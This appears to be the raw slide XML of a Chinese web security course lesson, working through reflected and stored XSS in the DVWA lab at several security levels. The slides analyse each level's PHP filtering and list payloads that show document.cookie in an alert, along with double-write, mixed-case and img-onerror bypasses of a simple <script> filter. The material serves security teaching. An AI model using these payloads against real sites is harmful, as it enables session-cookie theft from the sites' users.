              <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>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017250" cy="92646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3</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lang="zh-CN" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>impossible</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>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（1）查看源代码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2"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2147482549"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2359660" y="2204085"/>
            <a:ext cx="7437755" cy="309435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572770" y="1247775"/>
            <a:ext cx="11017250" cy="263906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3</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lang="zh-CN" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>impossible</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>级别的反射型XSS源代码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ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>        （2）源代码分析</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="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htmlspecialchars()函数的功能：把预定义的字符“&amp;”、“'”、“"”、“&lt;”、“&gt;”转换为HTML实体，防止浏览器将其作为HTML元素。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    代码采用了anti-token防御机制和htmlseecialchars()函数来防御，对用户输入的内容进行过滤，避免了XSS攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>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反射型XSS</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46101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5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2266950" y="1790700"/>
            <a:ext cx="7560000" cy="4874210"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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6259195" cy="1568450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>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6</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Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>应用安全</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="4800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN"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06</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1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="499110" y="1320165"/>
            <a:ext cx="10925810" cy="1274445"/>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、启动</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ZAP</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>   </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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ZAP</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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>主界面</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>                             </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
            </a:endParaRPr>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9" name="图片 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2094230" y="2247900"/>
            <a:ext cx="7778750" cy="4011295"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>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45529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、查看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>源代码</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65"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1594485" y="1933575"/>
            <a:ext cx="9000000" cy="4456475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5"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1325860" cy="446659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分析源代码</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当用户提交表单后，表单中Name和Message字段值首先会通过trim</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函数处理，以去除字段值前后的空格和预定义字符（包括“\ 0”、“\t”、“\ n”、“\x0B”和“\r”）。接下来，stripslashes</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函数将移除字段值中的字符“\”。随后，mysqli_real_escape_string</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函数会对特殊字符进行转义，这些字符包括 “NUL”、“\n”、“\r”、“\”、“'”、“"”和“Control-Z”。最后，将处理后的字段值直接插入到SQL的“INSERT INTO”语句中，并通过mysqli_query()函数执行。</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代码并未对“message”和“name”的输入进行XSS过滤，而且“message”和“name”的值保存在数据库中，存在比较明显的存储型XSS漏洞。</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396748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① 攻击者的攻击过程</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90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" eaLnBrk="0"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Name注入：aa</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Message注入：bb&lt;script&gt;alert(document.cookie);&lt;/script&gt;cc</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点击Sign Guestbook按钮。</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2947670" y="2233295"/>
            <a:ext cx="6296025" cy="1914525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>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1067415" cy="16973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① 攻击者的攻击过程</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400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>可以看到，弹出用户的Cookie值</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。点击弹框的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确定</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按钮，</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>可以看到，</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在当前页面上显示了Name和Message字段值。</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628650" y="3155950"/>
            <a:ext cx="5400000" cy="3031019"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6165850" y="3155950"/>
            <a:ext cx="5400000" cy="3031019"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>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22180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② 查看js代码是否存储在服务器上</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在服务器上，打开MySQL命令行</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窗口</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，执行命令：</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select * from dvwa.guestbook;</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457200" algn="l" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buSzTx/>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可以看到，js代码已存储在服务器上。</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indent="457200"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533650" y="3606800"/>
            <a:ext cx="7200000" cy="2403593"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>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133477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③ </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其他</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用户访问留言板</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这时，用户</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>只要访问</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>low级别的XSS(Stored)模块</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，js代码就会被执行。</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914400" lvl="2" indent="457200" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="9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indent="457200" algn="l" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buSzTx/>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ow级别的存储型XSS漏洞利用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2261870" y="2709545"/>
            <a:ext cx="7560000" cy="3809173"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700" cmpd="sng">
            <a:noFill/>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>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45847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、查看源代码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct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en-US" altLang="zh-CN"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69"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1683385" y="1841500"/>
            <a:ext cx="8726805" cy="4075430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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任务实施四：分析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>medium级别的存储型XSS源代码</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498475" y="1325245"/>
            <a:ext cx="11115675" cy="4628515"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" eaLnBrk="0" hangingPunct="0">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、分析源代码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" algn="l" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="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使用了过滤，过滤规则是：</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100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（1）对于message参数</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 addslashes()函数返回在预定义字符前添加反斜杠的字符串。预定义字符是：单引号“'”、双引号“"”、反斜杠“\”、NULL。</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 strip_tags()函数剥去字符串中的HTML、XML以及PHP的标签。</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③ htmlspecialchars()函数把一些预定义的字符转换为HTML实体。预定义的字符是：和号“&amp;”、双引号“"”、单引号“'”、小于“&lt;”、大于“&gt;”。</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100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（2）对于name参数</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fontAlgn="auto" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="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只是简单过滤字符串&lt;script&gt;，因此，这里存在绕过漏洞。</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任务实施四：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>分析medium级别的存储型XSS源代码</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5409565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" eaLnBrk="0" hangingPunct="0">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3、构造攻击载荷</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（1）双写绕过</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&lt;sc&lt;script&gt;ript&gt;alert(document.cookie);&lt;/script&gt;</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（2）大小写混淆绕过</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&lt;sCrIPt&gt;alert(document.cookie);&lt;/sCrIpT&gt;</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457200" algn="l" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50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（3）img标签进行绕过</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20000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pP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        &lt;img src=0 onerror=alert(document.cookie)&gt;</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20000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pP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20000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pP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en-US" altLang="zh-CN"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任务实施四：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>分析medium级别的存储型XSS源代码</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1840230"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" eaLnBrk="0" hangingPunct="0">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r>
              <a:rPr altLang="zh-CN" sz="2300" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在Vulnerability: Stored Cross Site Scripting (XSS)页面上，按F12，找到&lt;input name="txtName" type="text" size="30" maxlength="10"&gt;，将maxlength="10"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="zh-CN" sz="2300" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>修改为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="zh-CN" sz="2300" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>maxlength="100"。</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任务实施四：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>分析medium级别的存储型XSS源代码</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6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2276475" y="3119120"/>
            <a:ext cx="7560000" cy="3270719"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>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480060" y="1334135"/>
            <a:ext cx="11034395" cy="529399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、使用自动扫描</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
